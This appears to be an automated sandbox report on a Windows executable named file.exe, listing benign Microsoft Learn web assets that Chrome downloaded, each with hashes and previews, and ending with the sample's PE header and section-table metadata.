                                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):464328
                                                                                                                                                                                        Entropy (8bit):5.074669864961383
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                        MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                        SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                        SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                        SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                        Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                        Entropy (8bit):3.875
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:HMB:k
                                                                                                                                                                                        MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                        SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                        SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                        SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                        Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):25441
                                                                                                                                                                                        Entropy (8bit):5.152769469811509
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                        MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                        SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                        SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                        SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):195740
                                                                                                                                                                                        Entropy (8bit):5.430025391478659
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVli/:Wof3G0NSkNzMeO7z/l3l2
                                                                                                                                                                                        MD5:D82F4F5987237E395E490E03D4BE6149
                                                                                                                                                                                        SHA1:5AC34F59A61D63992B9E879641E4BE0B0EC102E2
                                                                                                                                                                                        SHA-256:27D8C10911B83F10EB6D8CA6AFE8CFD930F2310D3970B50DBADFC5777D1AA6B2
                                                                                                                                                                                        SHA-512:33E2378B78FFD3E5C9D101CEFAC955D245F693868BB73DAC536D508B85154C0A531C0AE03F838F924F7AB420E3B5C0D9F7FD7A3A62E9E8994E883658D67B169C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                        Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):25441
                                                                                                                                                                                        Entropy (8bit):5.152769469811509
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                        MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                        SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                        SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                        SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                        Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):15427
                                                                                                                                                                                        Entropy (8bit):7.784472070227724
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                        MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                        SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                        SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                        SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):52717
                                                                                                                                                                                        Entropy (8bit):5.462668685745912
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                        MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                        SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                        SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                        SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):1432
                                                                                                                                                                                        Entropy (8bit):4.986131881931089
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                        MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                        SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                        SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                        SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                        Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):52717
                                                                                                                                                                                        Entropy (8bit):5.462668685745912
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                        MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                        SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                        SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                        SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                        Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):1173007
                                                                                                                                                                                        Entropy (8bit):5.503893944397598
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                        MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                        SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                        SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                        SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                        Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):13339
                                                                                                                                                                                        Entropy (8bit):7.683569563478597
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                        MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                        SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                        SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                        SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Entropy (8bit):7.946962103342448
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:file.exe
                                                                                                                                                                                        File size:1'891'328 bytes
                                                                                                                                                                                        MD5:89a84eb8a83e3072365849af60f40dcc
                                                                                                                                                                                        SHA1:0d22977f6a49a60619e8fca8297ef92cab0ce52c
                                                                                                                                                                                        SHA256:6e05eacb5ba89bf57cbe21ea64b9e8fb72148ecc6624c55e1f82aa2efcee03d6
                                                                                                                                                                                        SHA512:24c2151099b4bcd7b20c56d6e2267551b58b92714ccdae10163f611987d06bca9049c2154412943b42f7d758fe83179b357846fcde382dd6c3e066828bcb4b42
                                                                                                                                                                                        SSDEEP:24576:tIn1Rzsp2ltX3ZQLsHzQjwo718789PpzJSjyYy8If8NDCSWZYBVpTw2cRMj:t6+2X3BHkXHpzAu8W8ZCSWZQO2cGj
                                                                                                                                                                                        TLSH:A29533D03C53B79DD6EB5BF825992242CB0D0009BF1C2A29BD4E1DE548F749B085AFB2
                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................J...........@...........................K...........@.................................\...p..
                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                        Entrypoint:0x8ad000
                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                        Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                        Instruction
                                                                                                                                                                                        jmp 00007F6B18BB697Ah
                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                        0x10000x560000x26200b200d772311f02bdcb221ca82a387c08False0.9992379610655737data7.9776660996071636IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .rsrc0x570000x2b00x2004f7d5450f0a87b8e1ba2dd96c8639c0eFalse0.794921875data6.014089382335133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        0x590000x2af0000x200913abe069a5b98f20c120fe08ad8a70bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        bydimkjm0x3080000x1a40000x1a3e008c58ec41ace7efdbbfc07ac69e5dc752False0.9948087228341769data7.95351090655131IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
